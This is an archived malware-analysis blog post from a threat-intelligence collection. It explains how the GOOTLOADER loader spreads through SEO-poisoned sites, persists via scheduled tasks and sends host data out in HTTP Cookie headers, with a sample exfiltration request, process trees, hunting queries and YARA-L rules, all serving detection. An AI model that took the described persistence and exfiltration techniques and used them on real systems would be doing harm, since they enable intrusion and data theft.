{
	"id": "f23f2905-0da7-4ddf-ae6a-4132e7faceb1",
	"created_at": "2026-04-06T00:10:02.907852Z",
	"updated_at": "2026-04-10T03:33:12.684401Z",
	"deleted_at": null,
	"sha1_hash": "bbc6fbc3c573715027731175ee6e287858152737",
	"title": "Finding Malware: Detecting GOOTLOADER with Google Security Operations.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2958793,
	"plain_text": "Finding Malware: Detecting GOOTLOADER with Google Security\r\nOperations.\r\nBy andy2002a\r\nPublished: 2024-10-31 · Archived: 2026-04-05 21:48:17 UTC\r\nWelcome to the Finding Malware Series\r\nThe \"Finding Malware\" blog series from Managed Defense is designed to empower the Google Security Operations\r\ncommunity to detect emerging and persistent malware threats. This post dives into the GOOTLOADER malware family\r\nand the detection opportunities available within the Google Security Operations (SecOps) platform. You can read the other\r\ninstallments to the series here. Happy hunting! \r\nAbout GOOTLOADER\r\nAlso known as: SLOWPOUR, Gootkit Loader\r\nGOOTLOADER is an obfuscated JavaScript downloader which Mandiant has observed being distributed in multiple\r\ncampaigns since 2021. In such campaigns, victims are tricked via search engine optimization (SEO) poisoning into\r\ndownloading archives from compromised websites. These archives contain the GOOTLOADER malware, which users then\r\nextract and execute on hosts.\r\nGOOTLOADER has been distributed by financially-motivated threat actors including UNC2565 as a means of initial\r\naccess to an environment. Successful GOOTLOADER infections have led to data exfiltration, extortion, and ransomware\r\ndeployment, as highlighted in a CISA advisory from August 2024.\r\nMandiant Managed Defense has observed the constant evolution of the GOOTLOADER malware such as the addition of\r\nnew payloads and obfuscation techniques. This has likely been done by the malware authors as a way to evade detection.\r\nDelivery\r\nIn typical campaigns distributing GOOTLOADER, victims are lured into visiting compromised WordPress websites via\r\nSEO poisoning. Victims perform a search, often for business-related documents such as legal requirements, agreements, or\r\ncontracts, and navigate to a compromised site with information purportedly related to their search. Victims then download an\r\narchive containing the malware, and extract and execute the malicious JavaScript file.\r\nBoth the archive and the JavaScript file have names that closely resemble the victim's search query. This naming scheme\r\nhelps trick the user into extracting and executing the malware.\r\nFigure 1: Screenshot of a compromised web page distributing GOOTLOADER malware (captured March 2024)\r\nGOOTLOADER Infection Chain\r\nThe typical GOOTLOADER infection chain consists of the following:\r\n.zip archive is downloaded from a compromised WordPress website.\r\n.js file (GOOTLOADER) from the .zip archive is extracted and executed.\r\nThis initial .js script saves a second stage payload to %AppData% with a .dat or .log file extension.\r\nThe .dat/.log file is renamed to .js.\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nPage 1 of 7\n\nA scheduled task is created to run the second stage .js file.\r\nThe second stage file decodes and executes an embedded GOOTLOADER.POWERSHELL payload that reaches\r\nout to the C2.\r\nFigure 2: GOOTLOADER components\r\nThe stages of the infection chain are explained in further detail below.\r\nFirst Stage JavaScript Execution\r\nThe extracted JavaScript is typically an open-source JavaScript library file, with the GOOTLOADER code embedded in it.\r\nThis technique aims to avoid detection by hiding an obfuscated JavaScript payload within a legitimate JavaScript library\r\nfile.\r\nThe typical first stage process tree during an infection is as follows:\r\nexplorer.exe ↳ \"C:\\\\Windows\\\\System32\\\\WScript.exe\" \"C:\\\\Users\\\\%USERNAME%\\\\AppData\\\\Local\\\\Temp\\\\\r\n\u003cZIP_FILE_NAME\u003e.zip\\\\\u003cJS_FILE_NAME\u003e.js\" (Execution of the downloaded malware)\r\nDespite being obfuscated, it is possible to extract the malware configuration from the first stage .js file by leveraging this\r\nPython script as described in a previous blog. This capability is also available to VirusTotal Enterprise users under the\r\nMalware configuration file section. \r\nFigure 3:  Managed Defense’s Backscatter script allows VT Enterprise users to extract GOOTLOADER configurations\r\nusing the Backscatter script.\r\nSecond Stage JavaScript Execution\r\nGOOTLOADER contains an obfuscated second stage payload that is decoded and saved to \r\nC:\\\\Users\\\\%USERNAME%\\\\AppData\\\\Roaming\\\\\u003cRANDOM_DIRECTORY\u003e\\\\\u003cHARD_CODED_FILE_NAME\u003e\r\nwith a file extension of .dat or .log. It is then renamed to .js. These file names are hard-coded in the original .js script file,\r\nand the file is padded with 40-60MB of junk characters in order to increase its size and avoid detection.\r\nA scheduled task is created in order to launch the second stage .js file. The task serves as a form of persistence and a way to\r\nexecute the second stage file for the first time.\r\nThe name of the scheduled task is hard-coded into the malware and usually includes business themes such as “Regulatory\r\nCommunication” or  “Motivated Operations”. The task will run at every user login, and the task action (command) will be\r\nset to the following:\r\nwscript \u003cSECOND_STAGE_8.3_FILENAME\u003e.JS\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nPage 2 of 7\n\nExecution of the scheduled task results in the following process tree, where the second stage .js file is first executed by\r\nwscript.exe which in turn runs the file with cscript.exe\r\nsvchost.exe (Scheduled Task) ↳ \"C:\\\\WINDOWS\\\\system32\\\\wscript.EXE\" \u003cSECOND_STAGE_8.3_FILENAME\u003e~1.JS ↳\r\n\"C:\\\\Windows\\\\System32\\\\cscript.exe\" \"\u003cSECOND_STAGE_8.3_FILENAME\u003e~1.JS\" ↳ powershell\r\nGOOTLOADER.POWERSHELL Execution\r\nThe second stage JavaScript decodes an embedded PowerShell script which Mandiant tracks as\r\nGOOTLOADER.POWERSHELL. This PowerShell script performs the following steps (note that the script has been\r\ndeobfuscated and its randomly-named functions/variables renamed to improve readability):\r\n1. The script starts with a while loop that randomly selects 1 of 10 hard-coded URLs and passes it to the c2_connect\r\nfunction\r\nFigure 4: Initial PowerShell loop \r\n2. The c2_connect function acquires data about the host such as the operating system, environment variables, running\r\nprocesses, files/folders, and storage drives.\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nPage 3 of 7\n\nFigure 5: c2_connect function \r\n3. The script Base64 encodes the collected information and compresses it using gzip before sending it to the C2 server. Prior\r\nto Base64 encoding, the script adds hard-coded bytes to the beginning and end of the data (\u003cbytes\u003e\u003cgzip-Data\u003e\u003cbytes\u003e).\r\nThis serves as a form of obfuscation, making it challenging to decode the compressed information without prior knowledge\r\nof those specific bytes. Note that Mandiant observed this additional obfuscation step in GOOTLOADER.POWERSHELL\r\ncompromises beginning roughly in June 2024. Previous versions of GOOTLOADER.POWERSHELL did not have this\r\nadditional step.\r\nFigure 6: data encoding function\r\n4. The gzip-encoded data along with a hard coded unique identifier ($unique_id) is placed in the HTTP Cookie header and\r\nsent through an HTTP GET request.\r\nBelow is a sample of an HTTP GET request with the $unique_id 1234567890.  The numbers 1 to 4 are appended to the\r\n$unique_id and represent the type of system information.\r\n1234567890 – environment variables and OS information\r\n12345678901 – running processes\r\n12345678902 – running desktop applications\r\n12345678903 – files, links, and folders on the desktop\r\n12345678904 – local disk drives with size of used disk space\r\nGET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/123.0.0.0 Safari/537.36 Cookie:\r\n1234567890=DwxFwXG9220+H4sIAAAAAAAEAJVVW2+bMBT+K6C9bNKKcmvSLk8UnMQdxsh2kk5CIJa4LSvBCOhN4sfPJqEhTZVuD1x8zufDuXyfMR1nTgGhHsET6IDA+uF7ubjLo4\r\n12345678901=DwxFwXG9220+H4sIAAAAAAAEAGVR7W7bMAx8lfoF/A5Z6jUeVjSI2xX7FSgWY2uRRIGUvwA//Cjba4sMBijpjjyTvF0I1tQqGvTfSTk4IMc5uxAODHSW8wY0ZzX6d\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nPage 4 of 7\n\nLUbkL0ihG7h77o93QHW4A96CVlHKHOtYz9mLh0cyvQABByBuwdqv97Nh4UiH2powZydoDEeaBOouEk+dj8bBt22pFSiq29JrGD+facAK6o5MnA6gbGwroN7U8B88ibQSVV55mbVqy\r\njJcvLheb3BdJZ47UV8Wc/caOxGQPfwEdasVywgIAABsMr3rFZrDa0g==;\r\n12345678902=DwxFwXG9220+H4sIAAAAAAAEAHMsKMjJTE4syczPcytKzE31yC8uifPNTC7KL85PK1FwTUlPrVGE80Fc/LLOARjyBfnlqUXFGak5OXHhmXkp+eXFCgEgoWCQELJ0f\r\n12345678903=DwxFwXG9220+H4sIAAAAAAAEAF2KQQrCMBBFrzI9gGLtDWxdCNIGqQeI8YODcaZMokXI4c3a1X+P99v5wYlcX5r2gvANEXRgqdarZNNIzgti9dPxmmAVznwzb4xUm\r\n12345678904=DwxFwXG9220+H4sIAAAAAAAEAHOOM7YwMDM2NrI0sjAAAKRsSCYNAAAAGwyvesVmsNrS Host: example[.]com\r\nConnection: Close\r\nThe contents of the HTTP Cookie header can be decoded using the CyberChef recipe below. The CyberChef recipe\r\nperforms the following actions:\r\nDecode the data from Base64\r\nUse regex to extract data from the gzip magic bytes (1F 8B) until the end (00) of the line\r\nDecompress the result using Gunzip.\r\nFrom_Base64('A-Za-z0-9+/=',true,false) To_Hex('Space',0) Regular_expression('User defined','1f 8b.*\r\n(00)',true,true,false,false,false,false,'List matches') From_Hex('Auto') Gunzip()\r\nFigure 7: CyberChef recipe that decodes data\r\n5. If the C2 responds to the GOOTLOADER.POWERSHELL request, then an additional payload is downloaded and\r\nexecuted using PowerShell’s Invoke-Expression cmdlet. Note that the C2 response must contain the host’s $unique_id in\r\norder for the command to execute. In some instances this response can occur several hours after the initial infection. \r\nIn the past the payload was FONELAUNCH, a .NET-based launcher that is written to the registry. However, in mid-2024\r\nthis has changed to a malicious DLL file that is executed using a renamed copy of rundll32.exe. In some instances this\r\nDLL file has been associated with CLEANBOOST, a backdoor malware.\r\nFurther steps in GOOTLOADER infections vary, but these initial compromises can lead to lateral movement in the\r\nenvironment followed by financially-motivated threat actor activity like ransomware deployment.\r\nThreat Hunting \u0026 Detection in Google SecOps\r\nHunting Opportunities\r\nMandiant Hunt surfaces otherwise undetected malicious activity by employing a detection strategy that uses both strong\r\nsignals (high enough fidelity to be reviewed 1:1) and weak signals (low fidelity on their own but provide broad coverage of\r\nthreat actor tactics) to enumerate attacker activity in customer environments. These signals are used to sequentially funnel\r\npetabytes of telemetry data to a practicable number of enriched and highly curated cases for analyst review. Mandiant uses\r\nsecurity frameworks like MITRE ATT\u0026CK® to help label data, find interesting sequences of activity, and share actionable\r\nresults with customers.\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nPage 5 of 7\n\nGoogle SecOps customers can use the following information to hunt for GOOTLOADER as well as other malicious\r\nactivity using similar tactics:\r\nFilewrite with suspicious extension to archive directory - Filewrites with these attributes may represent users\r\nextracting potentially-malicious files from archives. This is a common delivery mechanism for many malware\r\nfamilies, including GOOTLOADER. \r\nThese events map to MITRE ATT\u0026CK Technique T1204.002 - User Execution: Malicious File. Some examples\r\ninclude:\r\nC:\\\\Users\\\\\u003cUser\u003e\\\\AppData\\\\Local\\\\Temp\\\\Legal_document_example_search_94721.zip\\\\legal document\r\nexample search 90126.js\r\nC:\\\\Users\\\\\u003cUser\u003e\\\\AppData\\\\Local\\\\Temp\\\\fd3d6123-433a-4efb-a123-\r\nc43af0fa2f29_Legal_document_example_search(94721).zip.a58\\\\legal_document_example_search(90126).jsUse\r\nthe UDM query below in Google Security Operations to identify such file writes. The detection logic will likely find\r\nnumerous innocuous events in your environment, so add exclusions to those already included at the bottom of the\r\nquery to filter out the noise until interesting results remain.\r\n( metadata.event_type = \"FILE_CREATION\" OR metadata.event_type = \"FILE_MODIFICATION\" ) AND (\r\ntarget.file.full_path = /users/ nocase AND ( target.file.full_path = /\\\\.zip/ nocase OR target.file.full_path =\r\n/\\\\.rar/ nocase ) AND ( target.file.full_path = /vbs$/ nocase OR target.file.full_path = /js$/ nocase OR\r\ntarget.file.full_path = /hta$/ nocase OR target.file.full_path = /wsf$/ nocase OR target.file.full_path =\r\n/iso$/ nocase OR target.file.full_path = /img$/ nocase OR target.file.full_path = /vhd$/ nocase ) AND (\r\nprincipal.process.file.full_path = /rar/ nocase OR principal.process.file.full_path = /7z/ nocase OR\r\nprincipal.process.file.full_path = /explorer/ nocase ) AND NOT target.file.full_path = /setup\\\\.hta$/ nocase\r\nAND NOT target.file.full_path = /\\\\\\\\VSCode\\\\\\\\/ nocase AND NOT target.file.full_path = /index\\\\.js$/ nocase\r\nAND NOT target.file.full_path = /jquery/ nocase AND NOT target.file.full_path = /INetCache/ nocase )\r\nHTTP request with header containing long “Cookie” value  - Mandiant has observed GOOTLOADER infections\r\nlead to exfiltration of host information via HTTP requests containing the data in the header. These events map to\r\nMITRE ATT\u0026CK Technique T1041 - Exfiltration Over C2 Channel.\r\nUse the UDM query below in Google Security Operations to identify such exfiltration.\r\n( metadata.event_type = \"NETWORK_CONNECTION\" OR metadata.event_type = \"NETWORK_HTTP\" ) AND target.url =\r\n/Cookie:\\\\s[\\\\w=\\\\/+]{750,};/\r\nSuspicious Windows Script Host process execution - In GOOTLOADER compromises, execution of the second-stage payloads were performed by the Windows Script Host (WSH) binaries wscript.exe and cscript.exe. In such\r\ncompromises, the instance of cscript.exe launches a JavaScript file, which is an uncommon event in most\r\nenvironments. These events map to MITRE ATT\u0026CK Technique T1059.007 - Command and Scripting Interpreter:\r\nJavaScript.Use the UDM query below in Google Security Operations to identify process events where wscript.exe\r\nlaunches cscript.exe to execute a non-VBScript file. While not necessarily malicious, this activity is uncommon in\r\nmost environments and should be investigated to determine if it was legitimate.\r\nprincipal.process.file.full_path = /wscript\\\\.exe/ nocase AND target.process.file.full_path = /cscript\\\\.exe/\r\nnocase AND NOT principal.process.command_line = /\\\\.vbs/ nocase AND NOT target.process.command_line = /\\\\.vbs/\r\nnocase\r\nPowerShell filewrites to AppData\\\\Roaming or AppData\\\\Local\\\\Temp  - Following exfiltration of host\r\ninformation, Mandiant has observed GOOTLOADER compromises lead to PowerShell downloading additional\r\npayloads. In some instances, the additional payloads included a portable executable and a DLL file, with obfuscated\r\nfile names and extensions. These events map to MITRE ATT\u0026CK Technique T1059.001 - Command and Scripting\r\nInterpreter: PowerShell.Use the UDM query below in Google Security Operations to identify PowerShell writing\r\nfiles with suspicious extensions to either the AppData\\\\Roaming or AppData\\\\Local\\\\Temp directories. The\r\ndetection logic will likely find numerous innocuous events in your environment, so add exclusions to those already\r\nincluded at the bottom of the query to filter out the noise until interesting results remain. This activity is not exclusive\r\nto GOOTLOADER compromises; Mandiant has observed many malware families leveraging these directories to\r\nstore malicious files.\r\n( metadata.event_type = \"FILE_CREATION\" OR metadata.event_type = \"FILE_MODIFICATION\" ) AND (\r\nprincipal.process.file.full_path = /\\\\\\\\powershell\\\\.exe$/ nocase AND ( target.file.full_path =\r\n/\\\\\\\\AppData\\\\\\\\Roaming(\\\\\\\\[^\\\\\\\\\\\\/]+)?\\\\\\\\[^\\\\\\\\\\\\/]+\\\\.(svg|zip|rar|asp|png|jpg|iso|7z|html|doc|[A-Za-z]\r\n{5,8})$/ OR target.file.full_path = /\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\[^\\\\\\\\\\\\/]+\\\\.\r\n(svg|zip|rar|asp|jpg|iso|7z|doc)$/ ) AND ( principal.process.parent_process.file.full_path =\r\n/\\\\\\\\explorer\\\\.exe/ nocase OR principal.process.parent_process.file.full_path = /\\\\\\\\cmd\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\mshta\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\RuntimeBroker\\\\.exe/ nocase OR\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nPage 6 of 7\n\nprincipal.process.parent_process.file.full_path = /\\\\\\\\WinRAR\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\sihost\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\Installer\\\\.exe/ nocase OR\r\nprincipal.process.parent_process.file.full_path = /\\\\\\\\cmd\\\\.exe/ nocase ) )\r\nGoogle Security Operations Enterprise and Enterprise Plus customers will benefit from these detections being applied\r\nautomatically through curated detections. Standard customers can use the YARA-L rules below to create single or multi-event rules to detect the malware. You can even ask Gemini in Google Security Operations to do it for you. \r\nThis rule detects the extraction of a GOOTLOADER js file to a Temp folder:\r\nrule gootloader_js_extract { meta: author = \"Mandiant\" description = \"This rule matches the extraction of a\r\nGOOTLOADER js file by explorer.exe.\" mitre_attack_tactic = \"Execution\" mitre_attack_technique = \"User\r\nExecution: Malicious File\" mitre_attack_url = \"https://attack.mitre.org/techniques/T1204/002/\"\r\nmitre_attack_version = \"v15.1\" severity = \"High\" priority = \"High\" platform = \"Windows\" type = \"hunt\" events:\r\nre.regex($e.file_path, `\\\\\\\\users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\.+(_|\\\\s|\\\\()\\\\d{4,5}.?\\\\.zip.+\\\\.js$`)\r\nnocase and re.regex($e.principal.process.file.full_path, `explorer\\\\.exe`) nocase and $e.metadata.event_type =\r\n\"FILE_CREATION\" condition: $e }\r\nThis rule identifies the execution of GOOTLOADER malware from the Temp folder:\r\nrule gootloader_js_execute { meta: author = \"Mandiant\" description = \"This rule matches the execution of a\r\nGOOTLOADER js file from a temporary directory.\" mitre_attack_tactic = \"Execution\" mitre_attack_technique =\r\n\"Command and Scripting Interpreter: JavaScript\" mitre_attack_url =\r\n\"https://attack.mitre.org/techniques/T1059/007/\" mitre_attack_version = \"v15.1\" severity = \"High\" priority =\r\n\"High\" platform = \"Windows\" type = \"hunt\" events: re.regex($e.target.process.command_line,\r\n`wscript\\\\.exe.+\\\\\\\\users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\.+\\\\.js`) nocase or\r\nre.regex($e.principal.process.command_line,\r\n`wscript\\\\.exe.+\\\\\\\\users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\.+\\\\.js`) nocase condition: $e }\r\nThis rule identifies the creation of a large .dat, .log, or .js file by wscript.exe:\r\nrule gootloader_second_stage_create { meta: author = \"Mandiant\" description = \"This rule matches the creation\r\nof a large .dat, .log, or .js file by wscript.exe\" mitre_attack_tactic = \"Execution\" mitre_attack_technique =\r\n\"Command and Scripting Interpreter: JavaScript\" mitre_attack_url =\r\n\"https://attack.mitre.org/techniques/T1059/007/\" mitre_attack_version = \"v15.1\" severity = \"High\" priority =\r\n\"High\" platform = \"Windows\" type = \"hunt\" events: re.regex($e.target.file.full_path,\r\n`\\\\\\\\users\\\\\\\\.+\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\.+\\\\.(js|log|dat)$`) nocase and $e.metadata.event_type =\r\n\"FILE_CREATION\" and re.regex($e.principal.process.file.full_path, `wscript`) nocase and $e.target.file.size \u003e=\r\n4000000 condition: $e }\r\nThis rule identifies the creation of a GOOTLOADER scheduled task that executes a .js file using its 8.3 filename:\r\nrule gootloader_task_create { meta: author = \"Mandiant\" description = \"This rule matches the creation of a\r\nscheduled task that uses an 8.3 filename and a .js extension\" mitre_attack_tactic = \"Execution\"\r\nmitre_attack_technique = \"Scheduled Task/Job: Scheduled Task\" mitre_attack_url =\r\n\"https://attack.mitre.org/techniques/T1053/005/\" mitre_attack_version = \"v15.1\" severity = \"High\" priority =\r\n\"High\" platform = \"Windows\" type = \"hunt\" events: ($e.metadata.event_type = \"SCHEDULED_TASK_CREATION\" or\r\n$e.metadata.event_type = \"SCHEDULED_TASK_MODIFICATION\") and re.regex($e.target.process.command_line,\r\n`(c|w)script(\\\\.exe)?(\"|\\\\s){1,3}[A-Z0-9]{6}~1\\\\.js`) nocase condition: $e }\r\nThis rule identifies the execution of a GOOTLOADER scheduled task that executes a .js file using its 8.3 filename:\r\nrule gootloader_task_execute { meta: author = \"Mandiant\" description = \"This rule matches the execution of a\r\nGOOTLOADER scheduled task that uses an 8.3 filename.\" mitre_attack_tactic = \"Execution\" mitre_attack_technique\r\n= \"Scheduled Task/Job: Scheduled Task\" mitre_attack_url = \"https://attack.mitre.org/techniques/T1053/005/\"\r\nmitre_attack_version = \"v15.1\" severity = \"High\" priority = \"High\" platform = \"Windows\" type = \"hunt\" events:\r\nre.regex($e.target.process.command_line, `(c|w)script\\\\.exe(\"|\\\\s){1,3}[A-Z0-9]{6}~1\\\\.js`) nocase or\r\nre.regex($e.principal.process.command_line, `(c|w)script\\\\.exe(\"|\\\\s){1,3}[A-Z0-9]{6}~1\\\\.js`) nocase\r\ncondition: $e }\r\nHave questions or feedback for the Managed Defense team? Comment on the blog or ask a question in the Managed\r\nDefense Forum. \r\nSource: https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766"
	],
	"report_names": [
		"823766"
	],
	"threat_actors": [
		{
			"id": "fc7f0460-0a66-4178-9c5b-75abb22b87b0",
			"created_at": "2023-11-08T02:00:07.15123Z",
			"updated_at": "2026-04-10T02:00:03.427759Z",
			"deleted_at": null,
			"main_name": "UNC2565",
			"aliases": [
				"Hive0127"
			],
			"source_name": "MISPGALAXY:UNC2565",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434202,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bbc6fbc3c573715027731175ee6e287858152737.pdf",
		"text": "https://archive.orkl.eu/bbc6fbc3c573715027731175ee6e287858152737.txt",
		"img": "https://archive.orkl.eu/bbc6fbc3c573715027731175ee6e287858152737.jpg"
	}
}